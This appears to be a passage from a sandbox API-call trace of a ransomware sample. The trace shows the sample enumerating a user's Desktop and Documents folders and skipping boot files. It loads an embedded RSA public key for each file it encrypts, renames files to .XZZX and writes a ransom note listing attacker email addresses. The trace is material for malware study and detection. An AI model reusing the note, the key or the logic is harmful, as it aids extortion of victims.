3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") [0172.042] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0172.042] lstrcpyW (in: lpString1=0x179d3c, lpString2="lTddMw6tEfsH.wav" | out: lpString1="lTddMw6tEfsH.wav") returned="lTddMw6tEfsH.wav" [0172.042] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0172.042] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa20 [0172.043] Sleep (dwMilliseconds=0x96) [0172.232] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0 [0172.232] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0172.232] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0172.232] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" [0172.232] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*" [0172.232] SetErrorMode (uMode=0x1) returned 0x1 [0172.232] wsprintfW (in: param_1=0x1792fc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\_HELP_INSTRUCTION.TXT") returned 103 [0172.232] GetUserNameW (in: lpBuffer=0x1770d8, pcbBuffer=0x176ec4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x176ec4) returned 1 [0172.232] wsprintfW (in: param_1=0x176ed0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0172.232] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x176ecc | out: phkResult=0x176ecc*=0xa18) returned 0x0 [0172.232] RegQueryValueExW (in: hKey=0xa18, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x46aa90, lpcbData=0x176ec8*=0x104 | out: lpType=0x0, lpData=0x46aa90*=0x65, lpcbData=0x176ec8*=0x4a) returned 0x0 [0172.232] RegCloseKey (hKey=0xa18) returned 0x0 [0172.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x1782fc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0172.232] wsprintfW (in: param_1=0x1772fc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0172.233] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\0zrcybt06wyn8r-glj0\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.233] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\0zrcybt06wyn8r-glj0\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa18 [0172.233] WriteFile (in: hFile=0xa18, lpBuffer=0x1772fc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x1772f4, lpOverlapped=0x0 | out: lpBuffer=0x1772fc*, lpNumberOfBytesWritten=0x1772f4*=0x2c4, lpOverlapped=0x0) returned 1 [0172.233] CloseHandle (hObject=0xa18) returned 1 [0172.233] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*", lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0x3cde9d8 [0172.234] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="0zRcyBT06WYN8R-glJ0" [0172.234] lstrcpyW (in: lpString1=0x179504, lpString2="0zRcyBT06WYN8R-glJ0" | out: lpString1="0zRcyBT06WYN8R-glJ0") returned="0zRcyBT06WYN8R-glJ0" [0172.234] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0172.234] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0172.234] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0172.234] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0172.234] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0172.234] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0172.234] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0172.234] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0172.234] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0 [0172.234] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0172.234] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0172.234] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0172.234] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0172.234] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0172.234] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0172.234] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0172.234] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0172.234] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0172.234] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0172.234] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0172.234] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0172.234] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0172.234] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0172.234] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0172.234] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0172.234] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0172.234] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0172.234] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0172.234] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0172.235] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0172.235] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0172.235] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0172.235] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0172.235] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0172.235] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0172.235] SetErrorMode (uMode=0x1) returned 0x1 [0172.235] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0172.235] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0172.235] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0172.235] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0172.235] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0172.235] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="Documents" [0172.235] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0172.235] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0172.235] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0172.235] lstrcmpW (lpString1="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpString2="..") returned 1 [0172.235] lstrcmpW (lpString1="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpString2=".") returned 1 [0172.235] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0172.235] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="ntldr") returned 0x0 [0172.235] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="NTLDR") returned 0x0 [0172.235] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0172.235] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="ntdetect.com") returned 0x0 [0172.235] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0172.235] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0172.235] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0172.235] lstrcpyW (in: lpString1=0x17cf1c, lpString2="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" | out: lpString1="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX") returned="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" [0172.235] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0172.235] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa28 [0172.236] Sleep (dwMilliseconds=0x96) [0172.386] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0172.386] lstrcmpW (lpString1="2FFB243E16646FF464F688111A91543C.XZZX", lpString2="..") returned 1 [0172.386] lstrcmpW (lpString1="2FFB243E16646FF464F688111A91543C.XZZX", lpString2=".") returned 1 [0172.386] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0172.386] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="ntldr") returned 0x0 [0172.386] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="NTLDR") returned 0x0 [0172.386] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0172.386] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0172.386] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0172.386] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0172.386] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0172.386] lstrcpyW (in: lpString1=0x17cf1c, lpString2="2FFB243E16646FF464F688111A91543C.XZZX" | out: lpString1="2FFB243E16646FF464F688111A91543C.XZZX") returned="2FFB243E16646FF464F688111A91543C.XZZX" [0172.386] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0172.386] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa2c [0172.387] Sleep (dwMilliseconds=0x96) [0172.541] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0172.541] lstrcmpW (lpString1="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpString2="..") returned 1 [0172.541] lstrcmpW (lpString1="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpString2=".") returned 1 [0172.541] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0172.541] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="ntldr") returned 0x0 [0172.541] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="NTLDR") returned 0x0 [0172.541] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0172.541] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0172.541] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0172.541] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0172.542] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0172.542] lstrcpyW (in: lpString1=0x17cf1c, lpString2="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" | out: lpString1="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX") returned="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" [0172.542] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0172.542] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa30 [0172.542] Sleep (dwMilliseconds=0x96) [0172.697] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0172.697] lstrcmpW (lpString1="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpString2="..") returned 1 [0172.697] lstrcmpW (lpString1="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpString2=".") returned 1 [0172.697] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0172.697] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="ntldr") returned 0x0 [0172.697] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="NTLDR") returned 0x0 [0172.697] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0172.697] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="ntdetect.com") returned 0x0 [0172.697] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0172.697] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0172.698] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0172.698] lstrcpyW (in: lpString1=0x17cf1c, lpString2="4CA2A3B835A9C9D86061764339F6AE20.XZZX" | out: lpString1="4CA2A3B835A9C9D86061764339F6AE20.XZZX") returned="4CA2A3B835A9C9D86061764339F6AE20.XZZX" [0172.698] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: 